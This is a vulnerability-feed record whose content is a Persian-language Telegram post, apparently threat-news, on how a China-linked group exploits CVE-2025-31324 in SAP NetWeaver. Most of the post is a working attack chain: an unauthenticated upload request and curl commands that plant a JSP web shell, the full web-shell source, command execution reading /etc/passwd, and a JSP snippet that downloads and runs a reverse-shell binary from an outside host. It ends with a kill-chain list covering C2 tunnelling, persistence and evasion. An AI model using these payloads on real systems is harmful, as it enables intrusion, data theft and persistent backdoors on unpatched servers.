{"uuid": "c8b9e34c-252c-457a-983c-119dba33a333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-31324", "type": "exploited", "source": "https://t.me/ViralCyber/13205", "content": "\u23f2   \u06af\u0631\u0648\u0647 \u0645\u0631\u062a\u0628\u0637\u06cc \u0628\u0627 \u0686\u06cc\u0646 \u0628\u0627 \u0627\u0633\u0645 Chaya_004 \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u062d\u0631\u0627\u0646\u06cc CVE-2025-31324 \u062a\u0648 SAP NetWeaver \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647\u200c. \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u062a\u0648 \u0645\u0627\u0698\u0648\u0644 Visual Composer \u0648 \u0628\u0647 \u0637\u0648\u0631 \u062e\u0627\u0635 \u062a\u0648 \u0633\u0631\u0648\u06cc\u0633 MetadataUploader \u0628\u0627 \u0645\u0633\u06cc\u0631 /developmentserver/metadatauploader \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u0647. \u0627\u06cc\u0646 \u0633\u0631\u0648\u06cc\u0633 \u0642\u0631\u0627\u0631\u0647 \u0641\u0627\u06cc\u0644 \u0645\u062a\u0627\u062f\u06cc\u062a\u0627 \u0631\u0648 \u0628\u0631\u0627\u06cc \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u0647\u200c\u0647\u0627 \u0622\u067e\u0644\u0648\u062f \u06a9\u0646\u0647. \u0627\u0645\u0627 SAP \u06cc\u0647 \u0627\u0634\u062a\u0628\u0627\u0647 \u0645\u0631\u06af\u0628\u0627\u0631 \u06a9\u0631\u062f\u0647: \u0627\u06cc\u0646 endpoint \u0628\u062f\u0648\u0646 \u0647\u06cc\u0686 \u0646\u0648\u0639 authentication \u0628\u0627\u0632\u0647!\n\u0627\u06cc\u0646 endpoint \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u0641\u0627\u06cc\u0644\u200c \u0631\u0648 \u0628\u0627 \u0645\u062a\u062f POST \u062f\u0631\u06cc\u0627\u0641\u062a \u0648 \u0631\u0648\u06cc \u0633\u06cc\u0633\u062a\u0645 \u0630\u062e\u06cc\u0631\u0647 \u0645\u06cc\u200c\u06a9\u0646\u0647\u060c \u0628\u062f\u0648\u0646 \u0628\u0631\u0631\u0633\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u06a9\u0627\u0631\u0628\u0631 \u06a9\u06cc\u0647. \u062d\u0627\u0644\u0627 \u0627\u06af\u0647 \u0641\u0627\u06cc\u0644 \u0622\u067e\u0644\u0648\u062f\u06cc \u06cc\u0647 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a .jsp \u0628\u0627\u0634\u0647\u060c SAP NetWeaver \u0627\u0648\u0646 \u0631\u0648 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06cc\u0647 asset \u062f\u0627\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u0644\u0648\u062f \u0645\u06cc\u200c\u06a9\u0646\u0647 \u0648 \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u06a9\u0646\u0647!\n\n   \ud83d\udc48 \u06cc\u0639\u0646\u06cc \u0686\u06cc\u061f \u06cc\u0639\u0646\u06cc:\nPOST /developmentserver/metadatauploader HTTP/1.1\nHost: target-victim.com\nContent-Type: multipart/form-data; boundary=boundary\n\n--boundary\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.jsp\"\nContent-Type: application/octet-stream\n\n<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>\n--boundary--\n   \ud83d\udc48 \u0628\u0639\u062f\u0634 \u0641\u0642\u0637 \u06a9\u0627\u0641\u06cc\u0647 \u0628\u0631\u06cc:\nhttp://target-victim.com/VCService/shell.jsp?cmd=whoami\n\u0648 \u062a\u0645\u0627\u0645! \u06a9\u062f \u0631\u0648\u06cc \u0633\u0631\u0648\u0631 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u0634\u0647.\n\n\ud83d\udd39  \u0645\u0631\u062d\u0644\u0647 \u062f\u0648\u0645: \u067e\u06cc\u0627\u062f\u0647\u200c\u0633\u0627\u0632\u06cc \u062f\u0642\u06cc\u0642 - Exploit Chain\n   \ud83d\udc48 \u06af\u0627\u0645 1: Uploading JSP Web Shell\ncurl -X POST http://victim.com/developmentserver/metadatauploader \\\n  -F \"file=@shell.jsp\" -H \"Content-Type: multipart/form-data\"\n\u0645\u062d\u062a\u0648\u0627\u06cc shell.jsp:\n<%@ page import=\"java.io.*\" %>\n<%\nString cmd = request.getParameter(\"cmd\");\nProcess p = Runtime.getRuntime().exec(cmd);\nBufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));\nString line = null;\nwhile ((line = reader.readLine()) != null) {\n    out.println(line);\n}\n%>\n   \ud83d\udc48 \u06af\u0627\u0645 2: \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631\ncurl \"http://victim.com/VCService/shell.jsp?cmd=cat /etc/passwd\"\n\n\ud83d\udd39  \u0645\u0631\u062d\u0644\u0647 \u0633\u0648\u0645: Persistence \u0628\u0627 SuperShell\n\u0628\u0639\u062f \u0627\u0632 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0686\u06cc \u0646\u0635\u0628 \u06a9\u0631\u062f\u0646\u061f \u06cc\u0647 reverse shell \u0628\u0647 \u0633\u0628\u06a9 GoLang \u0628\u0647 \u0627\u0633\u0645 SuperShell. \u0627\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631 \u0645\u062b\u0644 Cobalt Strike \u0648\u0644\u06cc \u0633\u0628\u06a9\u200c\u062a\u0631 \u0648 stealth\u062a\u0631\u0647.\n   \ud83d\udc48 \u0648\u06cc\u0698\u06af\u06cc\u200c\u0647\u0627\u06cc \u062c\u0627\u0644\u0628 SuperShell:\n          \u2b05\ufe0f \u06cc\u06a9. Cross-platform (Linux/Windows)\n          \u2b05\ufe0f \u062f\u0648. TLS encrypted reverse shell\n          \u2b05\ufe0f \u0633\u0647. \u0641\u0627\u06cc\u0644 single-binary\u060c \u0642\u0627\u0628\u0644 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0647\u0645\u06cc\u0646 RCE\n          \u2b05\ufe0f \u0686\u0647\u0627\u0631. \u0628\u0627 \u0642\u0627\u0628\u0644\u06cc\u062a \u0627\u062c\u0631\u0627\u06cc \u062f\u0633\u062a\u0648\u0631\u060c TTY interactive\u060c \u0641\u0627\u06cc\u0644 \u0622\u067e\u0644\u0648\u062f \u0648 \u062f\u0627\u0646\u0644\u0648\u062f\n   \ud83d\udc48 \u0634\u0650\u0644 \u0631\u0648 \u0686\u0637\u0648\u0631\u06cc \u0646\u0635\u0628 \u06a9\u0631\u062f\u0646\u061f\n\u0641\u0627\u06cc\u0644 .jsp \u06cc\u0647 curl \u06cc\u0627 wget \u0633\u0627\u062f\u0647 \u0645\u06cc\u0632\u0646\u0647 \u0628\u0647 \u0633\u0631\u0648\u0631 CDN\u0634\u0648\u0646 \u0648 \u0641\u0627\u06cc\u0644 Golang shell \u0631\u0648 \u062f\u0627\u0646\u0644\u0648\u062f \u0645\u06cc\u200c\u06a9\u0646\u0647:\n<%\nString[] cmd = {\"/bin/sh\", \"-c\", \"wget http://malicious.cn/supershell -O /tmp/sshell; chmod +x /tmp/sshell; /tmp/sshell &\"};\nRuntime.getRuntime().exec(cmd);\n%>\n\n\ud83d\udd39  \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0648 C2 Network\n\u0647\u06a9\u0631\u0647\u0627 \u0641\u0642\u0637 \u06cc\u0647 RCE \u0633\u0627\u062f\u0647 \u0646\u0632\u062f\u0646\u060c \u06a9\u0644 \u0633\u0627\u062e\u062a\u0627\u0631 \u062d\u0645\u0644\u0647 \u0634\u0628\u06cc\u0647 \u06cc\u0647 kill-chain \u067e\u06cc\u0634\u0631\u0641\u062a\u0647\u200c\u0633\u062a:\n          \u2b05\ufe0f \u06cc\u06a9. Recon: \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc\u06cc \u0645\u062b\u0644 ARL \u0648 Pocassist \u0628\u0631\u0627\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0631\u062f\u0646 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc SAP \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\n          \u2b05\ufe0f \u062f\u0648. Exploit: \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 CVE-2025-31324 \u0628\u0627 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a curl/python\n          \u2b05\ufe0f \u0633\u0647. Payload: \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc SuperShell via .jsp\n          \u2b05\ufe0f \u0686\u0647\u0627\u0631. C2: Tunnel \u06a9\u0631\u062f\u0646 \u062a\u0631\u0627\u0641\u06cc\u06a9 \u0627\u0632 \u0637\u0631\u06cc\u0642 SoftEther VPN \u0648 NPS (\u06cc\u0647 reverse proxy \u0686\u06cc\u0646\u06cc)\n          \u2b05\ufe0f \u067e\u0646\u062c. Persistence: \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc\u06cc \u0645\u062b\u0644 Go Simple Tunnel \u06cc\u0627 Cobalt Strike \u0628\u0631\u0627\u06cc backdoor\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\n          \u2b05\ufe0f \u0634\u0634. Evade: \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u0627\u0631\u062a\u0628\u0627\u0637\u060c \u062a\u063a\u06cc\u06cc\u0631 \u0645\u0633\u06cc\u0631 DNS\u060c \u0648 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u0627\u0633\u0645\u06cc \u0646\u0627\u0645\u0641\u0647\u0648\u0645 \u0645\u062b\u0644 ssonkfrd.jsp\n\n\ud83d\udd39  \u062a\u062d\u0644\u06cc\u0644 \u0646\u0647\u0627\u06cc\u06cc: \u0686\u0631\u0627 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u062e\u0627\u0635\u0647\u061f\n          \u2b05\ufe0f \u06cc\u06a9. Zero Auth RCE \u0631\u0648\u06cc \u06cc\u06a9 ERP \u062d\u06cc\u0627\u062a\u06cc \u0645\u062b\u0644 SAP \u06cc\u0639\u0646\u06cc \u0646\u0641\u0648\u0630 \u0628\u0647 \u0642\u0644\u0628 \u0633\u0627\u0632\u0645\u0627\u0646.\n          \u2b05\ufe0f \u062f\u0648. \u062d\u0645\u0644\u0647 \u06a9\u0627\u0645\u0644\u0627\u064b \u0642\u0627\u0628\u0644 \u0627\u062a\u0648\u0645\u0627\u0633\u06cc\u0648\u0646 \u0628\u0627 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc PoC \u0622\u0645\u0627\u062f\u0647\u200c\u0633\u062a.\n          \u2b05\ufe0f \u0633\u0647. Golang payloads \u0645\u062b\u0644 SuperShell \u0628\u0627\u0639\u062b \u0645\u06cc\u0634\u0646 \u0622\u0646\u062a\u06cc\u200c\u0648\u06cc\u0631\u0648\u0633\u200c\u0647\u0627 \u06af\u06cc\u062c \u0628\u0634\u0646\u061b \u0686\u0648\u0646 \u0641\u0627\u06cc\u0644 \u0628\u0627\u06cc\u0646\u0631\u06cc \u0646\u0627\u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0633\u062a.\n          \u2b05\ufe0f \u0686\u0647\u0627\u0631. \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc open-source \u0648 \u0686\u06cc\u0646\u06cc \u0628\u0627\u0639\u062b \u0645\u06cc\u0634\u0647 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc APT \u0633\u062e\u062a\u200c\u062a\u0631 \u0628\u0634\u0647.\n\n\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83d\udd2b \ud83d\udd2b\ud83d\udd2b\ud83d\udd2b\ud83e\udee1\ud83d\udd2b\ud83d\udd2b\n\u23e9 @CyberWarfar", "creation_timestamp": "2025-05-11T23:42:16.000000Z"}